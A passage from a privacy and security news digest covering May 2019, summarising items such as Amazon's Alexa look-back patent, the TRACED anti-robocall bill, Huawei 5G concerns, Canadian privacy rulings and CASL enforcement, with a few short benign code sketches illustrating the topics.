A patent filed by Amazon and made public today would allow the company’s voice assistant Alexa to start recording audio before users say a “wake word” [see patent #10192546]. Its aim is to let users communicate more naturally with their devices, saying phrases like “Play some music, Alexa” rather than starting each command with “Alexa” or another chosen wake word. Currently, the voice assistant is unable to listen to or understand commands until the user utters the wake word. In practice, the patent would allow Alexa to “look backward” at recent things said aloud prior to hearing its name. For example, if a user said something like, “What’s the weather going to be like today, Alexa?” the device would hear the trigger word “Alexa” and quickly go back over the prior phrase to process the command. To accomplish that, the voice assistant would constantly be recording, storing and processing speech, then quickly deleting it if it is not relevant. Such a feature, if implemented, would raise considerable privacy concerns for users. The patent attempts to account for that, giving users the choice to allow Alexa to record and store audio for between 10 and 30 seconds at a time. Even so, the recording limit may not be enough to reassure some people. Amazon has already shown on several occasions that Alexa recordings aren’t as private as you may think. Recent reports revealed that Amazon employs a team of people who listen to and process Alexa recordings — and those auditors may have access to potentially personally identifiable information, including location data. Amazon has also accidentally sent a user someone else’s Alexa recordings and was ordered by a court to surrender audio from a person’s smart speaker as part of an ongoing trial. [engadget]
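As a minimal sketch of how the “look backward” behaviour could work, assume a rolling buffer of audio frames that never retains more than the user-configured window. The class and frame sizes below are invented for illustration and are not Amazon’s implementation.

```python
# Rolling "look backward" buffer -- illustrative sketch only.
from collections import deque

FRAME_SECONDS = 0.5
BUFFER_SECONDS = 10  # the patent describes user-set windows of 10-30 seconds

class LookBackBuffer:
    def __init__(self):
        self.frames = deque(maxlen=int(BUFFER_SECONDS / FRAME_SECONDS))

    def add_frame(self, frame):
        # Oldest frames fall off automatically, so nothing older than the
        # configured window is ever retained.
        self.frames.append(frame)

    def on_wake_word(self):
        # Hand the preceding audio to the command recognizer, then discard it.
        preceding = list(self.frames)
        self.frames.clear()
        return preceding

buf = LookBackBuffer()
for frame in ["what's the", "weather going to", "be like today", "Alexa"]:
    buf.add_frame(frame)
print(buf.on_wake_word())  # the speech captured just before the wake word
```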

Telecom / TV

US – Senate Passes Anti-Robocalling Bill

On May 23 a Senate bill, the Telephone Robocall Abuse Criminal Enforcement and Deterrence Act [see S.151 – TRACED Act here], aimed at fighting illegal robocalling, sailed through the US Senate with an overwhelming 97-1 vote. Now it’s headed to the House of Representatives, and from there to the desk of President Trump. Senators John Thune and Ed Markey introduced the bill in January. If the bill makes it through the House and is signed into law, it will empower the Federal Communications Commission (FCC) to impose hefty new fines – as much as $10,000 per call – for illegal robocalls. The legislation would also increase the statute of limitations for bringing such cases, giving FCC regulators more time to track down offenders. The act would also create an interagency task force to address the problem, and it would push carriers like AT&T and Verizon to deploy call authentication systems, such as the pending STIR/SHAKEN call identification protocols [here], in their networks. In February 2019, FCC Chairman Ajit Pai reiterated his call for a robust caller ID authentication system to be implemented this year. Earlier this month, Pai announced a new FCC initiative to fight illegal robocalls that would assure carriers that they can automatically enroll customers in call-blocking services; at this point, customers have to do it themselves. The proposed rule will be taken up for a vote next month. The House, meanwhile, is working on its own bill, the Stopping Bad Robocalls Act (HR 946) [read here], which was introduced by Rep. Frank Pallone Jr., the chairman of the Energy and Commerce Committee. [Naked Security (Sophos) | Senate passes anti-robocall bill]
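For the technically curious, the signing step at the heart of STIR/SHAKEN looks roughly like the sketch below: the originating carrier signs a PASSporT (RFC 8225) token attesting to the calling number, which travels in the SIP Identity header and is verified downstream against the carrier’s published certificate. The key handling and claim values here are illustrative assumptions, not a production implementation.

```python
# Sketch of PASSporT/SHAKEN signing using PyJWT (pip install pyjwt cryptography).
import time
import jwt  # PyJWT

def sign_passport(private_key_pem, orig_tn, dest_tn, cert_url):
    headers = {
        "alg": "ES256",
        "ppt": "shaken",    # SHAKEN extension of the PASSporT format
        "typ": "passport",
        "x5u": cert_url,    # where verifiers fetch the signing certificate
    }
    payload = {
        "attest": "A",              # "A" = full attestation of the caller
        "dest": {"tn": [dest_tn]},
        "iat": int(time.time()),
        "orig": {"tn": orig_tn},
        "origid": "de305d54-75b4-431b-adb2-eb6b9e546014",  # opaque call ID
    }
    # The resulting compact JWT is carried in the SIP Identity header.
    return jwt.encode(payload, private_key_pem, algorithm="ES256", headers=headers)
```

A terminating carrier would fetch the certificate named in x5u, verify the signature, and compare the orig/dest numbers against the actual call before deciding how to label or block it.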

US – U.S. Senate Intelligence Committee Urges Canada to Ban Huawei from 5G

US Senator Mark Warner (D-VA), vice-chair of the U.S. Senate intelligence committee, is urging Canada to join the United States in blacklisting China’s Huawei Technologies from next-generation 5G wireless networks. Warner claims Washington’s anti-Huawei drive is not a Buy American campaign. Huawei, the world’s largest telecommunications-equipment manufacturer, is at the heart of the battle between Washington and Beijing over what the Trump administration says is an effort by China to use its tech companies to advance its geopolitical goals. Warner told The Globe and Mail that he’s concerned Western governments are not paying sufficient heed to Washington’s warnings that Huawei is an “indirect agent” of Beijing’s ruling Communist Party and that countries cannot safeguard their new 5G networks against spying or backdoor malware. Warner asked: “Does the Canadian government, the Canadian public, want to have a system where their communications could be vulnerable on a regular basis to a foreign power?” He said it is in Canada’s national-security interest to prohibit domestic wireless companies from installing Huawei’s 5G technology in their next-generation networks, just as the United States, Australia and New Zealand have done. Canada and Britain, which are members of the Five Eyes intelligence-sharing alliance along with the U.S., Australia and New Zealand, have not taken any action yet against Huawei, but are conducting cybersecurity reviews of Huawei’s 5G equipment. Warner discounted assertions from Huawei’s top executives that the company would be prepared to sign non-spying pacts with countries that allow their telecoms to use its 5G gear, noting that China’s ruling Communist Party has passed sweeping laws forcing its companies and citizens to collaborate on espionage. BCE and Telus are major users of Huawei 3G and 4G equipment and have lobbied the Trudeau government to allow them to buy the Chinese tech firm’s 5G technology. Rogers, the country’s second-largest telecom, uses 5G from Sweden’s Ericsson. “The idea you can make this equipment secure is fundamentally flawed,” Warner said, adding that the ongoing maintenance of Huawei equipment – likely conducted by Huawei personnel – would give the company frequent access to Western wireless networks. Even if Canadians take over the upgrade work, Warner warns, there is still the risk of espionage through the repeated software updates that will be transmitted from Huawei to its equipment all over the world. “The idea that at any point in time, an upgrade could include a backdoor, malware … means there is not a way to get to the level of security that has traditionally existed amongst Five Eyes partners,” he said. The United States has warned that it will deny classified intelligence to allies who allow Huawei 5G. Warner said 5G technology is different in that risky vendors such as Huawei can’t be put behind a firewall. [The Globe and Mail | Huawei security and privacy chief calls for government collaboration | The case against Huawei, explained | U.S. blacklisting of Huawei prompts European firms to follow suit | Mobile Carriers in Britain and Japan Begin to Turn Away From Huawei]

US Government Programs

US – Lawmakers Seek to Curb Warrantless Device Searches at the Border

U.S. Sens. Ron Wyden, D-Ore., and Rand Paul, R-Ky., introduced the Protecting Data at the Border Act, which would require federal agents to obtain a warrant before searching the personal devices of U.S. residents crossing the border. Rep. Ted Lieu, D-Calif., introduced a companion bill in the House of Representatives. Currently, Customs and Border Protection can search devices without a warrant or probable cause. If the legislation is enacted, agents would have to obtain “a valid warrant supported by probable cause” to access personal devices. They would no longer be able to deny entry to individuals who refuse to provide passwords or social media account information, and they would be required to immediately destroy any data collected and to notify the individual when it is deleted. [NextGov]

US Legislation

US – California Excludes Employees from CCPA, Protects Loyalty Programs

On May 28 and 29, the California Assembly voted to approve four bills to amend the California Consumer Privacy Act (CCPA): 1) Assembly Bill 25 changes the CCPA so that the law does not cover collection of personal information from job applicants, employees, contractors, or agents; 2) Assembly Bill 1416 creates exceptions for businesses complying with government requests and for the sale of information for the detection of security incidents or fraud; 3) Assembly Bill 846 provides certainty to businesses that certain prohibitions in the CCPA do not apply to loyalty or rewards programs; and 4) Assembly Bill 1202, data broker registration legislation, would require data brokers to honor consumer opt-outs and any other rights afforded by the CCPA. The legislation now moves to the California Senate. In total, the Assembly has approved ten CCPA amendments; this blog post includes notes on the full list. [Ad Law Access (Kelly Drye)]

+++


1-15 May 2019

Biometrics

US – San Francisco Passes City Government Ban on Facial Recognition Tech

On May 14, San Francisco’s Board of Supervisors [meeting agenda] voted eight to one to approve a ban on the use of facial recognition tech by city agencies, including the police department, with San Francisco District 2 Supervisor Catherine Stefani dissenting. The Stop Secret Surveillance Ordinance is the first ban of its kind for a major American city and the seventh major surveillance oversight effort for a municipality in California. Supervisor Aaron Peskin [here & wiki here], who sponsored the bill, said during Tuesday’s board meeting: “I want to be clear — this is not an anti-technology policy,” deemphasizing the ban aspect and instead framing the ordinance as an outgrowth of sweeping California data privacy reforms [such as the California Consumer Privacy Act (CCPA) – see here, wiki here & infographic here] and an extension of prior efforts in other counties around the state. In 2016, Santa Clara County passed its own predecessor to San Francisco’s surveillance oversight policy, but that ordinance did not include a ban. The ordinance also includes a provision that would require city departments to seek specific approval before acquiring any new surveillance equipment. The ban does not impact facial recognition tech deployed by private companies, though it does affect any companies selling such tech to the city government. City agencies will be allowed to continue using what they already have, including police body cameras and license plate readers. Across the bridge from San Francisco, Oakland and Berkeley are both mulling their own regulations for facial recognition tech, known as the Surveillance and Community Safety Ordinance and the Surveillance Technology Use and Community Safety Ordinance, respectively. The East Bay might not be far behind San Francisco’s own vote. [TechCrunch | Forbes: Why San Francisco’s Facial Recognition Ban Won’t Actually Have Any Impact | Should Police Facial Recognition Be Banned? | San Francisco, Oakland could be first cities in nation to ban facial recognition | San Francisco Committee Passes Ordinance to Ban Facial Recognition]

US – Photo Storage App Used Images to Train Facial-Recognition Tech Without Users’ Knowledge

Photo storage app Ever used pictures shared to the service to train its facial-recognition system without informing its users. Ever has sold its facial-recognition technology to private companies, law enforcement and the military. “This looks like an egregious violation of people’s privacy,” American Civil Liberties Union of Northern California Technology and Civil Liberties Attorney Jacob Snow said. “They are taking images of people’s families, photos from a private photo app, and using it to build surveillance technology. That’s hugely concerning.” Ever CEO Doug Aley said the company does not share photos or any other identifying user information, but rather uses the images to teach an algorithm to better identify faces. [NBC News]

Big Data / Data Analytics / Artificial Intelligence

UK – ICO Blogs on Meaningfulness of Human Involvement in AI Systems

Researchers at the Information Commissioner’s Office (ICO) have started a blog series discussing the ICO’s work in developing a framework for auditing artificial intelligence (AI). The ICO [PDF] and the European Data Protection Board (EDPB) have both published guidance on automated individual decision-making and profiling. The main takeaways are that human reviewers must actively check a system’s recommendation, consider all available input data, weigh up and interpret the recommendation, consider any additional factors, and use their authority and competence to challenge the recommendation if necessary. In some circumstances, human input should also account for additional risk factors that may cause a system to be regarded as solely automated under the GDPR. These risks appear most often in complex AI systems and can lead to (1) automation bias and (2) a lack of interpretability. The ICO recommends that an organisation decide at the outset of its design phase whether its AI application is intended (i) to enhance human decision-making or (ii) to make solely automated decisions. This decision requires management or board members to fully understand the risk implications of choosing one way or the other. Additionally, they need to ensure that accountability and effective risk management policies are in place from the outset. Other key recommendations include: training human reviewers to ensure they understand the mechanisms and limitations of AI systems and how their own expertise enhances the systems; and monitoring reviewers’ inclinations to accept or reject the AI’s output and analysing such approaches. [Technology Law Dispatch (ReedSmith)]
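One of those recommendations, monitoring reviewers’ inclination to accept or reject the AI’s output, lends itself to a simple sketch. The code below is an illustrative assumption about how such monitoring might be implemented, not something taken from the ICO blogs: it tracks per-reviewer override rates, since a rate stuck near zero can signal automation bias, that is, reviewers rubber-stamping the system, which risks the decision being treated as solely automated under the GDPR.

```python
# Illustrative automation-bias monitor -- not from the ICO guidance.
from collections import defaultdict

class ReviewLog:
    def __init__(self):
        self.counts = defaultdict(lambda: {"agreed": 0, "overridden": 0})

    def record(self, reviewer, ai_recommendation, human_decision):
        key = "agreed" if human_decision == ai_recommendation else "overridden"
        self.counts[reviewer][key] += 1

    def override_rate(self, reviewer):
        c = self.counts[reviewer]
        total = c["agreed"] + c["overridden"]
        return c["overridden"] / total if total else None

log = ReviewLog()
log.record("reviewer_1", "reject", "reject")
log.record("reviewer_1", "reject", "approve")
print(log.override_rate("reviewer_1"))  # 0.5 -- evidence of active human review
```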

Canada

CA – Canada Privacy Law Remains Focus in Google ‘Right To Be Forgotten’ Case

Instead of navigating constitutional questions, Canada’s Federal Court will render its decision in Google’s “right to be forgotten” case based on specific points in the country’s privacy law. The reference case, brought by Privacy Commissioner Daniel Therrien in October, will focus on how Google’s collection of personal data, as it relates to de-indexing, should be interpreted under Canada’s Personal Information Protection and Electronic Documents Act. Google tried to have the case dismissed in April, arguing it is exempt from both points of law at issue and that the OPC’s narrow inquiries leave no room for constitutional consideration, but the Federal Court dismissed the challenge. [Financial Post]

CA – B.C. Court Allows Class-Action Lawsuit Against Facebook to Expand

On May 10, B.C. Supreme Court Justice Nitya Iyer issued a ruling that a class-action lawsuit launched against Facebook by a British Columbia woman, Deborah Douez [details], is allowed to expand to include residents of Saskatchewan, Manitoba and Newfoundland and Labrador. Douez claims the social media giant used her image and those of others without their knowledge in the “sponsored stories” advertising program that is no longer in operation. Facebook Inc. fought the certification of the class action all the way to the Supreme Court of Canada and lost [see Docket 36616 & news coverage]. Justice Iyer also agreed with Douez that Facebook is obligated to pay any profits that it made from the unauthorized use of the class members’ names or portraits. If someone liked a product under the program, which ran from January 2011 to May 2014, Facebook generated a news feed endorsement using the person’s name and profile photo, but didn’t tell that person their image was being used. Iyer ruled that if the plaintiffs were asking for damages, she would agree with Facebook that the change should be denied, but she noted that disgorgement of profits is a remedy under the privacy laws of Saskatchewan, Manitoba and Newfoundland and Labrador. [Calgary Herald]

CA – CMA Guide Addresses Privacy Commissioner Findings

The Canadian Marketing Association (CMA) made public the CMA Guide to Transparency for Consumers [Press release], noting that measures outlined in the Guide enable organizations to effectively address findings in the survey released last week by the Office of the Privacy Commissioner (OPC) [“2018-19 Survey of Canadians on Privacy” Press Release]. The Guide was developed by leading Chief Privacy Officers in Canada and informed by two research studies issued by the CMA last year. “There has been a high level of interest in this guide since we released it to our members in January,” stated John Wiltshire, CMA president and CEO. “It is important to share this information with all Canadian marketers so that they can make it easier for consumers not only to know more about how their personal information is being used, but also to have more choice and control.” The CMA’s Transparency Framework is built on three pillars:

  • Information is layered so that consumers can choose the level of detail that suits them, and receive information in smaller amounts, as it is needed;
  • Information is tailored to the medium and the audience, such as a succinct user-friendly “privacy label” that can easily be read on a small screen; and
  • The approach reflects the shared roles of individuals, organizations and regulators.

Organizations can select from the approaches outlined in the CMA Guide to Transparency for Consumers to develop consumer information on their privacy practices that is suited to their business model and consumers’ preferences. [News & Views (The Canadian Marketing Association) | Canadians concerned about their privacy online and taking precautions: study]

CA – TTC Suspends Transit Officers’ Collecting of PI When Issuing Warnings

The Toronto Transit Commission (TTC) has suspended the practice of having its transit officers collect personal information from people who are issued warnings on the transit system, following a Star investigation [in March 2019] that raised privacy and discrimination concerns about the policy. The transit agency announced in mid-March that officers would stop using specialized police-style forms to collect the information, but at the time TTC CEO Rick Leary said they would still record riders’ personal details in their notebooks, pending the outcome of an internal review of the policy. However, at a meeting of the TTC board, Alan Cakebread, the head of the agency’s enforcement unit, revealed his officers are no longer recording the information at all [April 8 meeting details & docs]. “We’ve stopped collecting any of that data until the review of the program is complete,” he said. The agency is expected to report back to the board in July with the outcome of the review, which will examine the TTC’s need to take riders’ personal information, and how it is used and retained. Transit agency spokesperson Stuart Green confirmed that Cakebread directed officers to stop collecting the data on March 27, two weeks after Leary announced the discontinuation of the specialized forms. The agency has said the system allows them to identify potential repeat offenders and determine whether a rider deserves a ticket or merely a warning. Through a freedom of information request, the Star obtained redacted details from the database spanning nearly 11 years, during which time officers entered personal details from caution cards more than 40,000 times. [Toronto Star]

CA – Two Ontario Privacy Class Action Certification Decisions Released

The Ontario Superior Court of Justice has released two decisions in certification motions in privacy class actions: 1) In Tocco v. Bell Mobility Inc., 2019 ONSC 2916 (CanLII) [PDF], the Court certified the class action in which it is alleged that the defendant breached privacy rights by using the personal information of data service customers for a marketing initiative without obtaining their consent; and 2) In Kaplan v. Casino Rama, 2019 ONSC 2025 (CanLII) [see PDF], the Court dismissed the certification motion for the proposed class action brought by individuals whose personal information was stolen in a cyber-attack and subsequently posted online. Also see AccessPrivacy’s third issue of “Privacy in the Courts: A Quarterly Review“. This quarterly review of Canadian jurisprudence contains summaries of recent privacy cases in both the public and private sectors, intended to help busy in-house counsel, Chief Privacy Officers and compliance professionals get quickly up to date, while gaining broader perspective on how Canadian privacy law is evolving over time. The case summaries, authored by Professor Teresa Scassa [see blog] of the University of Ottawa, are accompanied by expert commentary from Osler practitioners across different practice areas. [Access Privacy (Osler, Hoskin & Harcourt)]

CA – Proposed Privacy Class Action “Collapses in its Entirety” on Commonality

On May 7, 2019, in Kaplan v. Casino Rama Services Inc. (Kaplan), the Ontario Superior Court of Justice  refused to certify a privacy class action arising out of a criminal cyberattack that included allegations of breach of privacy, breach of contract and negligence [see 21 pg PDF ruling by Justice Belobaba here]. In November 2016, Casino Rama publicly announced that it was the victim of a criminal cyberattack in which patron, employee, and vendor information was stolen [see Ontario IPC statement  & news coverage]. The plaintiffs commenced a class action alleging negligence, breach of contract, intrusion upon seclusion, breach of confidence, and publicity given to private life. By the time of the certification hearing [November 2018], there was no evidence that anyone had experienced fraud, identity theft or any kind of compensable financial loss or serious and prolonged psychological harm because of the cyberattack. Justice Belobaba dismissed the motion for certification of the class action, holding: “The fact that there are no provable losses and that the primary culprit, the hacker, is not sued as a defendant makes for a very convoluted class action. Class counsel find themselves trying to force square (breach of privacy) pegs into round (tort and contract) holes.” The Court found that the scope and content of the standard of care in negligence owed to each class member would depend on the sensitivity of the personal information that had been collected about them: the less sensitive the information, the lower the standard of care. As a result, Justice Belobaba held that there was no basis in fact to establish that a question about whether the defendants breached any applicable duty of care could be answered in common across the class. Similarly, for the plaintiffs’ intrusion upon seclusion claim, the Court concluded that individual inquiries would be required to determine if class members were in fact embarrassed or humiliated by the disclosure of personal information about them (such as, for example, the fact that they were patrons of a casino). The breach of contract issues failed because the Court found that there was no evidence from any of the class members regarding the terms of any contracts relating to protection of personal information, or that such terms were sufficiently similar to allow for a class-wide determination of whether they were breached. Given the Court’s conclusion on the common issues, it did not determine the class definition. However, Justice Belobaba noted that even if the case had been certified, he would have defined the class more narrowly than the plaintiffs had proposed. The decision comes on the heels of another recent decision denying certification of a privacy class action, Broutzas v. Rouge Valley Health System (Broutzas) [read decision & overviews here & here], which signals that Canadian courts are scrutinizing the appropriateness of class proceedings in these types of highly individualized cases. Citing Broutzas, Justice Belobaba observed in Kaplan that not all personal information that may be disclosed without consent is necessarily private or confidential. Furthermore, where the kinds of personal information stolen in a cyberattack vary widely from individual to individual, questions relating to the standard of care in negligence and breach of privacy will quickly devolve into individual inquiries that are unsuitable for class treatment. 
Justice Belobaba also spoke in positive terms about Casino Rama and the Ontario Lottery and Gaming Corporation’s response to the cyberattack. This is an important reminder to organizations that a prompt and effective response to a privacy breach is not only the right thing to do for affected customers and employees; it also has the added benefit of reducing litigation risks. [Business Class (Blakes)]

CA – Canada Lawmakers Demand Facebook’s Zuckerberg, Sandberg Testify

Canadian lawmakers have summoned Facebook Inc.’s Mark Zuckerberg and Sheryl Sandberg to testify at a parliamentary committee after a watchdog report found the social media giant violated Canadian privacy law. Canada’s Standing Committee on Access to Information, Privacy and Ethics [see ETHI, meeting 147 details & watch] issued the summons in a closed-door meeting, according to minutes published afterwards [read]. Zuckerberg and Sandberg were summoned to appear at a date that hasn’t been determined. Canada’s privacy watchdog, Daniel Therrien [who was a witness at the May 7 meeting – read his prepared remarks], last month said Facebook committed “serious contraventions” of Canadian law in the Cambridge Analytica saga, but that Facebook essentially dismissed the findings [read OPC Facebook report]. Therrien said he had no legal authority to enforce his findings, leading to the committee’s vote on Tuesday. “This is a highly unusual step to take but Facebook’s disregard for the rights of Canadian citizens and the recent finding of the Privacy Commissioner that Facebook broke Canadian law has necessitated our decision,” lawmaker Charlie Angus, who put forward the motion to summon the executives, said in an email Wednesday. “We will see if they are willing to respect the Parliament of Canada and the presence of legislators from around the world.” A Facebook spokeswoman did not immediately respond to a request for comment. [Bloomberg | CBC.ca | Facebook’s Mark Zuckerberg, Sheryl Sandberg face subpoena from Canadian Parliament | Ethics committee votes to subpoena Facebook’s Mark Zuckerberg to testify]

CA – Yukon’s Public-Service Watchdog Releases 2018 Summary Report

On April 29, Diane McLeod-McKay, who serves as the Yukon territory’s ombudsman, information and privacy commissioner, and public interest disclosure commissioner, released her 2018 annual report. It outlines the key achievements and challenges of each of McLeod-McKay’s offices last year, and provides examples of cases each handled. Her workload doubled in 2018 compared to the year prior, with a sudden spike in whistleblower cases and requests to review the outcomes of access-to-information requests making up the lion’s share of the work. The busiest office was that of the information and privacy commissioner (IPC), which accounted for 136 files in 2018 (in 2017, by comparison, the office opened just 64). Of those, 59 files were requests for review of decisions made by various Yukon government departments in response to access-to-information requests, which are governed by the Access to Information and Protection of Privacy Act (ATIPP). The report pointed to a lack of proper training, and of willingness to cooperate with the IPC, among staff at public bodies as the reasons behind the spike in requests for review: for example, staff not knowing how to properly conduct searches for records and taking months to provide the IPC with records that are subject to a review. In an interview April 30, McLeod-McKay added that the lack of proper upfront work by some public bodies has a “domino effect.” “When things aren’t … going well within the departments, it flows through to my office, and of course, that just means a whole bunch of resources being used to process these requests that shouldn’t be occurring,” she said. “I’m so backlogged right now, I have adjudications that are a year old that I can’t get to. And it’s very problematic from an access-to-information perspective, and distressing, I think, from a public who have a right of access.” The IPC office also saw a “slight increase” in Health Information Privacy and Management Act (HIPMA) files in 2018, opening 33 compared to 31 in 2017. [Yukon News]

CA – CBSA Officers Confiscate Lawyer’s Phone and Laptop After He Refuses to Give Up Passwords

On April 10, Toronto business lawyer and former Green party candidate Nick Wright [here & wiki here] had his phone and laptop seized by Canada Border Services Agency officers after he refused to tell them his passwords. Wright is an elected bencher with the Law Society of Ontario [see here]. He has maintained that his electronic devices contain information that’s protected under solicitor-client privilege, but the CBSA still intends to crack the passwords to conduct searches. He feels that searching phones without a warrant is “a breach of our constitutional rights”. Section 8 of the Charter states that everyone has the right to be secure against unreasonable search or seizure. In June 2015, the CBSA issued an operational bulletin defining digital devices as “goods”, and it maintains that officers are permitted to examine goods under the Customs Act and the Immigration and Refugee Protection Act. According to the Office of the Privacy Commissioner of Canada, charter rights at border points “continue to apply but are limited by state imperatives of national sovereignty, immigration control, taxation and public safety and security”. The bulletin was issued when the Conservatives were in power, but the current Liberal minister, Bill Blair, hasn’t amended it to offer any protections for lawyers who might have information about their clients on their devices. Chalk this up as another example of the Liberal government’s questionable regard for the Canadian Charter of Rights and Freedoms. [The Georgia Straight | “Your phone is not safe at the border,” advocates warn after man’s electronic devices seized at Pearson Airport | Canada Border Services seizes lawyer’s phone, laptop for not sharing passwords | CBSA has used DNA testing on some detainees since at least 2016. Now, it’s making national rules]

Consumer

CA – Canadians Concerned About Privacy Online and Taking Precautions: Study

According to a recent $66K survey conducted by Phoenix SPI for the Privacy Commissioner of Canada, Canadians have expressed concerns with how they believe their personal information is being handled by the government and companies [read OPC PR and survey]. 87% of the Canadians surveyed were concerned with the way social media platforms gather personal information to create detailed profiles of individuals. Two-thirds believe that the government is responsible for privacy protection, and nine in 10 believe that their personal information on social media influences decisions made about them, such as their chances of getting a job, health coverage, or an insurance claim. Phoenix SPI surveyed 1,500 Canadians in February 2019. [MobileSyrup]

WW – People Say They Care About Privacy But They Continue to Buy Devices That Can Spy On Them

Experts explain why people are giving mixed signals about smart tech. A new smart device survey of people in the United States, Canada, Japan, Australia, France, and the United Kingdom by Consumers International and the Internet Society highlights the seeming contradiction between people’s stated privacy preferences and their actions [see report]. Some 63% of people find connected devices, defined broadly as everyday products that can connect to the internet using wifi or Bluetooth, to be “creepy,” and 75% don’t trust the way their data is shared by those devices, yet nearly 70% of survey takers said they own one or more smart or connected devices. Mobile phones, tablets, and computers weren’t included. Furthermore, sales of smart devices increased 25% last year, according to market research firm IDC. A March study from voice-tech blog Voicebot showed that even those who said they were “very concerned” about the privacy risks posed by smart speakers were only 16% less likely to own one than the general public. Why would people buy and use devices in the presumed privacy of their homes if they don’t trust them? It’s complicated. [The remainder of this long article explores the reasons some experts propose]: 1) people don’t understand the extent of the data smart devices are collecting; 2) the trade-offs are worth it; 3) consumers don’t have other options; 4) people assume the government will take care of it; and 5) we don’t actually care that much about privacy. According to the survey, of those who don’t have connected devices, 28% cited a lack of trust in the devices’ privacy or security, while 63% say they have no use for them. As smart devices become more useful and their privacy snafus more numerous, perhaps that sentiment will flip. [Vox | The privacy paradox: why do people keep using tech firms that abuse their data? | Consumers kinda, sorta care about their data | People Are Concerned About Their Privacy in Theory, Not Practice, Says New Study | Americans care about their digital data, but not enough to quit big tech | New Study Shows That Americans Will Not Pay for Online Privacy | The Privacy Paradox and the Marketer’s Dilemma]

WW – Study Reveals Privacy Behavior Affected by Wi-Fi Location

According to a Pennsylvania State University study, researchers found an individual’s online privacy behaviors and habits vary based on the internet connection they are using. The study focused on participants’ “publicness heuristic,” which is a mindset that keeps a person from revealing private things in public settings, and it explored how the mindset works with different privacy-related scenarios in various locations. The research concluded that participants with a higher publicness heuristic viewed a public network as less secure than their home or a university network, which led them to disclose less information and participate in fewer unethical behaviors. “These results indicate a need to leverage the positive heuristics triggered by location, VPN logo and a terms and conditions statement for ethical design practices,” Penn State James P. Jimirro Professor of Media Effects S. Shyam Sundar said. [PSU News]

WW – New Book Debates Effects of Tech on Teens

At the IAPP Global Privacy Summit, Data & Society Founder and President danah boyd joined Marc Groman and David Reitman’s Their Own Devices podcast to talk about her book, “It’s Complicated: The Social Lives of Networked Teens.” After interviewing more than 150 teens across 18 states, boyd concluded that technology might not have as poor an impact on teens as many perceive, and she is concerned that teen perspectives are being overlooked on the topics of tech, online policy and their own online actions. Groman and Reitman discuss and debate boyd’s findings and what role parents have in a teen’s digital presence. [Apple podcast]

E-Mail

CA – Individual Found Liable for CASL Compliance Violations

In an April 23 precedent-setting decision, the Canadian Radio-television and Telecommunications Commission (CRTC) fined the former President and Chief Executive Officer [Knoxville, TN businessman Brian Conley] of a group of businesses [nCrowd, Inc. BBB here also see here] $100,000 for violations of Canada’s Anti-Spam Legislation (CASL) [see text here also guidance at CRTC here & OPC here] [read CRTC PR, Notice of Violation/Summary & decision]. A CRTC investigation, which began in response to complaints submitted by both Canadian businesses and individuals, determined that the companies committed systematic violations of CASL [and that Conley was allowing or ignoring violations of the law]. The complainants alleged that the subject emails were sent to them without their consent and that they were unable to unsubscribe from future receipt of email from nCrowd. As part of its investigation, the CRTC provided notice to nCrowd’s President and CEO that the agency sought to hold him personally liable for the companies’ alleged violations. The CRTC found that nCrowd purchased an email distribution list that was comprised of addresses published online rather than addresses for which express consent to receive commercial email was obtained. It determined that nCrowd failed to provide any evidence that it had internal policies or procedures designed to ensure compliance with CASL’s opt-out requirements, which necessitate, among other things, that consumer opt-out requests be honored within 10 business days of receipt. Ultimately the CRTC concluded that the executive was personally liable for these violations due to the agency’s determination that he directed, authorized, assented to, acquiesced in, or otherwise participated in the commission of the subject violations. Importantly, the CRTC determined that personal liability is proper even if the companies themselves are not held liable for such CASL violations. [KMT Blog (Klein Moynihan Turco) | CRTC ups the CASL liability ante for directors and officers | CASL Violations – CRTC is Serious About Director Liability | Canada’s anti-spam law used against ex-CEO of coupon marketing company | Anti-spam laws are overreaching, say lawyers]
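
To make those mechanics concrete, here is a minimal sketch in Python of the two obligations at issue: sending commercial email only with consent, and honouring opt-outs within 10 business days of receipt. This is illustrative only, not legal advice; the suppression list and function names are invented, and the deadline helper ignores statutory holidays.

    from datetime import date, timedelta

    suppression_list = {"optout@example.com": date(2019, 4, 1)}  # address -> opt-out date

    def opt_out_deadline(received: date, business_days: int = 10) -> date:
        """Latest date an opt-out may take effect under CASL (weekends skipped)."""
        current, remaining = received, business_days
        while remaining:
            current += timedelta(days=1)
            if current.weekday() < 5:  # Monday=0 .. Friday=4
                remaining -= 1
        return current

    def may_send(address: str, has_consent: bool) -> bool:
        """Gate every commercial email on consent and the suppression list."""
        return has_consent and address not in suppression_list

    print(opt_out_deadline(date(2019, 4, 1)))    # 2019-04-15
    print(may_send("optout@example.com", True))  # False

In practice senders suppress an address as soon as the request arrives; the 10-business-day figure is the statutory ceiling, not a grace period to keep mailing.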

EU Developments

EU – CNIL Releases Best Practices to Improve Products at Design Stage

France’s data protection authority, the CNIL, has released a series of best practices to help developers improve their products at the design stage. The agency released its “Developer Kit” as a way to ensure any solution, website or program that processes data is created to protect users’ information. The CNIL offers recommendations for developers when choosing a tool, such as reading the conditions of use if the tool receives personal data. The kit also offers guidelines for managing source code, strengthening the quality of the code, and documenting code and architecture. (Original article is in French.) [CNIL.fr]

WW – Microsoft Changes Data-Collection Categories

Microsoft is updating its data-collection methods following run-ins with the European Data Protection Supervisor and the Dutch government over EU General Data Protection Regulation compliance. Microsoft will now have “required” and “optional” categories for the data it collects from customers using its services. “In recent months we’ve heard from customers — especially those in Europe — with questions about the data that is collected from their devices when they use our products and services,” Microsoft Corporate Vice President and General Counsel Julie Brill said. “We are working on providing additional configuration options that will give customers more control over the collection of data that’s required for certain features or functions.” [ZDNet]

Facts & Stats

US – Errors Blamed for 21% of Data Breaches: Verizon Report

Verizon issued its 2019 Data Breach Investigations Report May 8 [see PR, Executive Summary, read the full report or download PDF]. It says 21% of data breaches looked at last year were caused by employee errors. More worrying, system administrators as a source of accidental breaches are creeping up. “While the rogue admin planting logic bombs and other mayhem makes for a good story,” says the report, “the presence of insiders is most often in the form of errors. These are either by misconfiguring servers to allow for unwanted access or publishing data to a server that should not have been accessible by all site viewers.” The overwhelming majority of threats come from outside the enterprise: 69% of the breaches looked at. Insiders (defined as employees) were behind 34% of breaches, partners were blamed for 2%, while 5% involved insiders and partners. This year’s report looked at 41,686 security incidents from 73 contributors (including the FBI), of which 2,013 were confirmed data breaches. Verizon defines a data breach as a disclosure of data, not just a potential leak. The report breaks incidents into nine classifications (including crimeware, espionage, insider and privilege misuse, denial of service, payment card skimmers, point-of-sale intrusions, and miscellaneous errors) and applies them across a number of sectors. The idea is to give CISOs in these industries insight into attack patterns and help them plan their defence strategies. Among the findings:

